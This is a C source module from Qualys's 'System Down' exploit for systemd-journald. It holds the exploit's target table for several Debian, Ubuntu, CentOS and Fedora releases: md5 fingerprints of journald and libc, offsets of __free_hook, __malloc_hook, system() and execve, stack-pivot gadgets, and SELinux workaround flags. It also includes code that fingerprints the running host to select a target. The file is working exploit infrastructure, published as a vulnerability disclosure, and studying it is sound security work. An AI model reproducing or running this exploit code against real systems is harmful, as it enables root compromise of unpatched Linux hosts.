/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#include "journald.h"
#include "macro.h"
#include "target.h"

static const target_t targets[] = {
    {
        .name = "debian-9.6.0-amd64-xfce-CD-1.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "2e43fa6792326c4fcb5d456017c89705", "/lib/systemd/systemd-journald" },
            { "250e826cc07c9eeb52bb05f99c301c76", "/lib/systemd/libsystemd-shared-232.so" },
            { "dc6abed98572f9e74390316f9d122aca", "/lib/x86_64-linux-gnu/libc.so.6" },
            { "fddbfb4d68c55694513b63dcf1ab577b", "/lib64/ld-linux-x86-64.so.2" },
        },
        /*
         * src/journal/journald-server.h:#define N_IOVEC_META_FIELDS 22
         */
        .n_iovec_meta_fields = 22,
        /*
         * src/journal/journald-server.h:#define N_IOVEC_OBJECT_FIELDS 14
         */
        .n_iovec_object_fields = 14,
        /*
         * From dispatch_message_real's lowest alloca to journal_file_append_entry's rsp before items alloca:
         *   a667:       48 83 ec 08             sub    $0x8,%rsp
         *   a688:       6a 00                   pushq  $0x0
         *   a694:       e8 c7 af ff ff          callq  5660 <journal_file_append_entry@plt>
         * 125c80:       55                      push   %rbp
         * 125c84:       41 57                   push   %r15
         * 125c86:       41 56                   push   %r14
         * 125c88:       41 55                   push   %r13
         * 125c8a:       41 54                   push   %r12
         * 125c8c:       53                      push   %rbx
         * 125c8d:       48 81 ec 88 00 00 00    sub    $0x88,%rsp
         */
        .stack_pointer_distance = 208,
        /*
         * Trial and error:
         */
        .items_alloca_shift = 0x30,
        /*
         * 000177a0  45 43 54 5f 50 49 44 3d  00 5f 54 52 41 4e 53 50  |ECT_PID=._TRANSP|
         * 000177b0  4f 52 54 3d 6a 6f 75 72  6e 61 6c 00 66 00 72 65  |ORT=journal.f.re|
         */
        .transport_offset = 0x000177a0 + 9,
        /*
         *  213: 000000000039b788     8 OBJECT  WEAK   DEFAULT   34 __free_hook@@GLIBC_2.2.5
         */
        .free_hook_offset = 0x000000000039b788,
        /*
         * 1353: 000000000003f480    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
         */
        .system_offset = 0x000000000003f480,
        /*
         * LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
         *                0x0000000000022ca0 0x0000000000022ca0  R E    0x200000
         */
        .ldso_rx_size = 0x0000000000022ca0,
    },
    {
        .name = "debian-9.5.0-amd64-xfce-CD-1.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "2e43fa6792326c4fcb5d456017c89705", "/lib/systemd/systemd-journald" },
            { "1df882a5ec1505e2b599034596e58a66", "/lib/systemd/libsystemd-shared-232.so" },
            { "dc6abed98572f9e74390316f9d122aca", "/lib/x86_64-linux-gnu/libc.so.6" },
            { "fddbfb4d68c55694513b63dcf1ab577b", "/lib64/ld-linux-x86-64.so.2" },
        },
        .n_iovec_meta_fields = 22,
        .n_iovec_object_fields = 14,
        .stack_pointer_distance = 208,
        .items_alloca_shift = 0x30,
        .transport_offset = 0x000177a0 + 9,
        .free_hook_offset = 0x000000000039b788,
        .system_offset = 0x000000000003f480,
        .ldso_rx_size = 0x0000000000022ca0,
    },
    {
        .name = "debian-9.6.0-i386-xfce-CD-1.iso",
        .arch = TARGET_I386,
        .md5sums = {
            { "fd74ef41f5c07b79e527db2f6956cb8e", "/lib/systemd/systemd-journald" },
            { "3c29b83a55ebd357b538dabf089be992", "/lib/systemd/libsystemd-shared-232.so" },
            { "de398fb4c1f9aedeffeb758cd8905f21", "/lib/i386-linux-gnu/libc.so.6" },
        },
        .n_iovec_meta_fields = 22,
        .n_iovec_object_fields = 14,
        /*
         * From dispatch_message_real's lowest alloca to journal_file_append_entry's esp before items alloca:
         */
        .stack_pointer_distance = 176,
        .items_alloca_shift = 0,
        .transport_offset = 0x00015b00 + 9,
        /*
         * 1174: 001b3768     4 OBJECT  WEAK   DEFAULT   33 __malloc_hook@@GLIBC_2.0
         */
        .malloc_hook_offset = 0x001b3768,
        /*
         * b16eb:       e8 70 ff ff ff          call   b1660 <execve@@GLIBC_2.0>
         */
        .call_execve_offset = 0xb16eb,
        /*
         * 0x000cfcf0 : mov esp, 0x89fffa5d ; ret
         */
        .stack_pivot_offset = 0x000cfcf0,
        .stack_pivot_esp = 0x89fffa5dUL,
        .stack_pivot_retn = 0,
    },
    {
        .name = "debian-9.5.0-i386-xfce-CD-1.iso",
        .arch = TARGET_I386,
        .md5sums = {
            { "fd74ef41f5c07b79e527db2f6956cb8e", "/lib/systemd/systemd-journald" },
            { "e0e8af93d245ef3278bea0ed7e5143ea", "/lib/systemd/libsystemd-shared-232.so" },
            { "de398fb4c1f9aedeffeb758cd8905f21", "/lib/i386-linux-gnu/libc.so.6" },
        },
        .n_iovec_meta_fields = 22,
        .n_iovec_object_fields = 14,
        .stack_pointer_distance = 176,
        .items_alloca_shift = 0,
        .transport_offset = 0x00015b00 + 9,
        .malloc_hook_offset = 0x001b3768,
        .call_execve_offset = 0xb16eb,
        .stack_pivot_offset = 0x000cfcf0,
        .stack_pivot_esp = 0x89fffa5dUL,
        .stack_pivot_retn = 0,
    },
    {
        .name = "CentOS-7-x86_64-Minimal-1804.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "81d961b940848d489aff68cb76f80045", "/usr/lib/systemd/systemd-journald" },
            { "41f0c69459cd4a674b499167da121544", "/lib64/ld-linux-x86-64.so.2" },
            { "b188921fdac427f7e5b7f621362fe1d9", "/lib64/libc.so.6" },
        },
        /*
         * 0238-Revert-journald-move-dev-log-socket-to-run.patch
         */
        .dev_log = "/dev/log",
        /*
         * 0384-journald-fix-count-of-object-meta-fields.patch
         */
        .n_iovec_meta_fields = 20,
        .n_iovec_object_fields = 12,
        .stack_pointer_distance = 208,
        .items_alloca_shift = 0x70,
        .transport_offset = 0x0003c7d0 + 4,
        /*
         * 1343: 00000000003c71c0   224 OBJECT  GLOBAL DEFAULT   33 _IO_2_1_stderr_@@GLIBC_2.2.5
         */
        .stderr_chain_offset = 0x00000000003c71c0 + 0x68,
        /*
         * 1801: 00000000003c2e60   168 OBJECT  GLOBAL DEFAULT   28 _IO_wfile_jumps@@GLIBC_2.2.5
         */
        .wfile_jumps_offset = 0x00000000003c2e60,
        .system_offset = 0x00000000000431b0,
        .ldso_rx_size = 0x0000000000021910,
        /*
         * avc:  denied  { execute } for  pid=21311 comm="sh" name="exploit" dev="dm-0" ino=4206339
         * scontext=system_u:system_r:syslogd_t:s0 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file
         */
        .setuid_shells = true,
    },
    {
        .name = "ubuntu-18.04.1-server-amd64.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "465b37a040ff86ef00ddeb233b8ffcda", "/lib/systemd/systemd-journald" },
            { "5635c2db5762d03eb9555e7a715d6bd3", "/lib/systemd/libsystemd-shared-237.so" },
            { "50390b2ae8aaa73c47745040f54e602f", "/lib/x86_64-linux-gnu/libc.so.6" },
            { "ecedcc8d1cac4f344f2e2d0564ff67ab", "/lib64/ld-linux-x86-64.so.2" },
        },
        .n_iovec_meta_fields = 22,
        .n_iovec_object_fields = 18,
        .stack_pointer_distance = 208,
        .items_alloca_shift = 0x30,
        .transport_offset = 0x00019da0 + 2,
        .free_hook_offset = 0x00000000003ed8e8,
        .system_offset = 0x000000000004f440,
        .ldso_rx_size = 0x0000000000026c24,
    },
    {
        .name = "ubuntu-16.04.5-server-amd64.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "2c431f8d831d566cc6c4e7738928590a", "/lib/systemd/systemd-journald" },
            { "5d8e5f37ada3fc853363a4f3f631a41a", "/lib/x86_64-linux-gnu/libc.so.6" },
            { "f5ebf0bbc32238922f90e67cb60cdf7e", "/lib64/ld-linux-x86-64.so.2" },
        },
        .n_iovec_meta_fields = 20,
        .n_iovec_object_fields = 12,
        .stack_pointer_distance = 176,
        .items_alloca_shift = 0,
        .transport_offset = 0x000404a0 + 12,
        .free_hook_offset = 0x00000000003c67a8,
        .system_offset = 0x0000000000045390,
        .ldso_rx_size = 0x00000000000253f8,
    },
    {
        .name = "ubuntu-16.04.5-server-i386.iso",
        .arch = TARGET_I386,
        .md5sums = {
            { "21bc7935afbaa03779d4dd1175b1b83f", "/lib/systemd/systemd-journald" },
            { "5efa4121a76c377005e2f75c65ead6c4", "/lib/i386-linux-gnu/libc.so.6" },
        },
        .n_iovec_meta_fields = 20,
        .n_iovec_object_fields = 12,
        .stack_pointer_distance = 144,
        .items_alloca_shift = 0,
        .transport_offset = 0x000412b0 + 10,
        .malloc_hook_offset = 0x001b2768,
        .call_execve_offset = 0xb0fb6,
        .stack_pivot_offset = 0x0010ef2b,
        .stack_pivot_esp = 0x90669066UL,
        .stack_pivot_retn = 0,
    },
    {
        .name = "Fedora-Server-dvd-x86_64-27-1.6.iso",
        .arch = TARGET_AMD64,
        .md5sums = {
            { "1938aab85b4396993fe533eee4999500", "/usr/lib/systemd/systemd-journald" },
            { "26dd749a9451058d6fb4fe744f89e8ca", "/usr/lib/systemd/libsystemd-shared-234.so" },
            { "7daacb299112c187ad9fd36159f2f9f9", "/lib64/ld-linux-x86-64.so.2" },
            { "57b30206f8b6d184d74c35d2c330d15d", "/lib64/libc.so.6" },
        },
        /*
         * avc:  denied  { map } for  pid=507 comm="systemd-journal"
         * path=2F6D656D66643A74656D7066696C65202864656C6574656429 dev="tmpfs" ino=25594
         * scontext=system_u:system_r:syslogd_t:s0 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file
         * permissive=0
         */
        .deny_memfd = true,
        .n_iovec_meta_fields = 22,
        .n_iovec_object_fields = 14,
        .stack_pointer_distance = 208,
        .items_alloca_shift = 0x30,
        .transport_offset = 0x000183d0 + 13,
        .free_hook_offset = 0x00000000003e18a8,
        .system_offset = 0x0000000000047c30,
        .ldso_rx_size = 0x0000000000027064,
        .setuid_shells = true,
    },
};

static void
validate_target(const target_t * const target)
{
    if (!target) die();
    if (!target->name) die();
    if (!target->n_iovec_meta_fields) die();
    if (!target->n_iovec_object_fields) die();
    if (!target->transport_offset) die();

    if (!target->stack_pointer_distance) die();
    if (target->stack_pointer_distance % SIZE_SZ) die();

    if (target->items_alloca_shift & 0xf) die();
    if (target->items_alloca_shift % sizeof(EntryItem)) die();

    switch (target->arch) {
    case TARGET_I386:
        if (SIZE_SZ != sizeof(uint32_t)) die();
        if (SIZE_SZ != sizeof(uintptr_t)) die();
        if (!target->malloc_hook_offset) die();
        if (!target->call_execve_offset) die();
        if (!target->stack_pivot_offset) die();
        if (!target->stack_pivot_esp) die();
        break;
    case TARGET_AMD64:
        if (SIZE_SZ != sizeof(uint64_t)) die();
        if (SIZE_SZ != sizeof(uintptr_t)) die();
        if (target->free_hook_offset) {
            if (target->stderr_chain_offset) die();
        } else {
            if (!target->stderr_chain_offset) die();
            if (!target->wfile_jumps_offset) die();
        }
        if (!target->system_offset) die();
        if (!target->ldso_rx_size) die();
        break;
    default:
        die();
    }
}

static bool
check_md5sum(const md5sum_t * const md5sum)
{
    if (!md5sum) die();
    if (!md5sum->file) die();
    if (!md5sum->digest) die();

    static char buf[PATH_MAX];
  {
    xsnprintf(buf, sizeof(buf), "md5sum %s 2>&1", md5sum->file);
    FILE * const fp = popen(buf, "re");
    if (!fp) die();
    if (fgets(buf, sizeof(buf), fp) != buf) die();
    if (pclose(fp) == -1) die();
  }
    const size_t len = strcspn(buf, " ");
    buf[len] = '\0';
    return !strcmp(buf, md5sum->digest);
}

static const target_t * target;

void
initialize_target(void)
{
    if (target) die();

    size_t i;
    for (i = 0; i < ELEMENTSOF(targets); i++) {
        bool match = false;
      {
        size_t j;
        for (j = 0; j < ELEMENTSOF(targets[i].md5sums); j++) {
            if (!targets[i].md5sums[j].file) break;

            match = check_md5sum(&targets[i].md5sums[j]);
            if (!match) break;
        }
      }
        if (match) {
            validate_target(&targets[i]);
            target = &targets[i];
            puts(target->name);
            return;
        }
    }
    die();
}

const char *
target_bin_journald(void)
{
    if (!target) die();

    static const char * bin_journald;
    if (!bin_journald) {
        size_t j;
        for (j = 0; j < ELEMENTSOF(target->md5sums); j++) {
            if (!target->md5sums[j].file) break;

            if (strstr(target->md5sums[j].file, "journald")) {
                if (bin_journald) die();
                bin_journald = target->md5sums[j].file;
            }
        }
    }
    if (!bin_journald) die();
    return bin_journald;
}

#define IMPLEMENT_TARGET_ACCESSOR(member, specific_arch) \
typeof(((target_t *)0)->member) \
target_ ## member(void) \
{ \
    if (!target) die(); \
    if ((specific_arch) && target->arch != (specific_arch)) die(); \
    return target->member; \
}

IMPLEMENT_TARGET_ACCESSOR(arch, TARGET_NONE)
IMPLEMENT_TARGET_ACCESSOR(deny_memfd, TARGET_NONE)
IMPLEMENT_TARGET_ACCESSOR(n_iovec_meta_fields, TARGET_NONE)
IMPLEMENT_TARGET_ACCESSOR(n_iovec_object_fields, TARGET_NONE)
IMPLEMENT_TARGET_ACCESSOR(stack_pointer_distance, TARGET_NONE)
IMPLEMENT_TARGET_ACCESSOR(items_alloca_shift, TARGET_NONE)

IMPLEMENT_TARGET_ACCESSOR(malloc_hook_offset, TARGET_I386)
IMPLEMENT_TARGET_ACCESSOR(call_execve_offset, TARGET_I386)
IMPLEMENT_TARGET_ACCESSOR(stack_pivot_offset, TARGET_I386)
IMPLEMENT_TARGET_ACCESSOR(stack_pivot_esp, TARGET_I386)
IMPLEMENT_TARGET_ACCESSOR(stack_pivot_retn, TARGET_I386)

IMPLEMENT_TARGET_ACCESSOR(free_hook_offset, TARGET_AMD64)
IMPLEMENT_TARGET_ACCESSOR(stderr_chain_offset, TARGET_AMD64)
IMPLEMENT_TARGET_ACCESSOR(wfile_jumps_offset, TARGET_AMD64)
IMPLEMENT_TARGET_ACCESSOR(system_offset, TARGET_AMD64)
IMPLEMENT_TARGET_ACCESSOR(setuid_shells, TARGET_AMD64)
IMPLEMENT_TARGET_ACCESSOR(ldso_rx_size, TARGET_AMD64)

const char *
target_dev_log(void)
{
    if (!target) die();
    return target->dev_log ?: "/run/systemd/journal/dev-log";
}

size_t
target_malloc_alignment(void)
{
    if (!target) die();
    return target->malloc_alignment ?:
        (2 * SIZE_SZ < __alignof__ (long double) ? __alignof__ (long double) : 2 * SIZE_SZ);
}

size_t
target_mmap_threshold_max(void)
{
    if (!target) die();
    switch (target->arch) {
    case TARGET_I386:
        return (512 * 1024);
    case TARGET_AMD64:
        return ELF64_SEGMENT_ALIGNMENT;
    }
    die();
}

uintptr_t
target_stack_top_max(void)
{
    if (!target) die();
    switch (target->arch) {
    case TARGET_I386:
        return 0xc0000000UL;
    case TARGET_AMD64:
        return (uintptr_t)0x7ffffffff000ULL;
    }
    die();
}

static uintptr_t
target_stack_top_min(void)
{
    if (!target) die();
    switch (target->arch) {
    case TARGET_I386:
        return 0xbf800000UL;
    case TARGET_AMD64:
        return (uintptr_t)0x7ffc00000000ULL;
    }
    die();
}

#define target_stack_bottom_min() (target_stack_top_min() - journald_LimitSTACKSoft())

bool
is_pie_address(const uintptr_t __address)
{
    const uintmax_t address = __address;
    if (!target) die();
    switch (target->arch) {
    case TARGET_I386:
        return (address >= 0x00400000UL && address < 0x00800000UL);
    case TARGET_AMD64:
        return (address >= 0x555500000000ULL && address < 0x565600000000ULL);
    }
    die();
}

bool
is_mmap_address(const uintptr_t __address)
{
    const uintmax_t address = __address;
    if (!target) die();
    switch (target->arch) {
    case TARGET_I386:
        return (address >= 0xb2000000UL && address < 0xb8000000UL);
    case TARGET_AMD64:
        return (address >= 0x7efb00000000ULL && address < target_stack_bottom_min());
    }
    die();
}

bool
is_stack_address(const uintptr_t address)
{
    if (!target) die();
    return (address >= target_stack_bottom_min() && address < target_stack_top_max());
}

bool
is_valid_address(const uintptr_t address)
{
    if (!target) die();
    return (address >= 65536 && address < target_stack_top_max());
}

bool
is_transport_address(const uintptr_t address)
{
    if (!target) die();
    if (!is_pie_address(address)) return false;
    return ((address % PAGE_SIZE) == (target->transport_offset % PAGE_SIZE));
}

